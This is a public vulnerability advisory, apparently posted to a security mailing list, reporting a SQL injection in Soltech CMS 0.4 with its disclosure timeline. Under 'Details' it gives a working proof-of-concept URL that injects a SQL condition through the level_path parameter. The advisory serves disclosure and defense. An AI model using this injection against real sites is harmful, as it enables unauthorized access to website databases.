Soltech CMS 0.4 SQL Injection

2013.08.15

Credit: MustLive

Risk: Medium

Local: No

Remote: Yes

CVE: N/A

CWE: CWE-89

Hello list!
There is SQL Injection vulnerability in Soltech.CMS. This is commercial CMS.
-------------------------
Affected products:
-------------------------
Vulnerable are Soltech.CMS v 0.4 and previous versions.
-------------------------
Affected vendors:
-------------------------
Soltech
http://soltech.com.ua
----------
Details:
----------
SQL Injection (WASC-19):
http://site/index.php?level_path=%27%20or%20version()=5%23
------------
Timeline:
------------
2013.06.05 - announced at my site.
2013.06.07 - informed developers about the first part of vulnerabilities.
2013.07.14 - informed developers about the second part of vulnerabilities.
2013.08.13 - disclosed at my site (http://websecurity.com.ua/6550/).
Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua

References:

http://websecurity.com.ua

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Soltech CMS 0.4 SQL Injection

References:

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.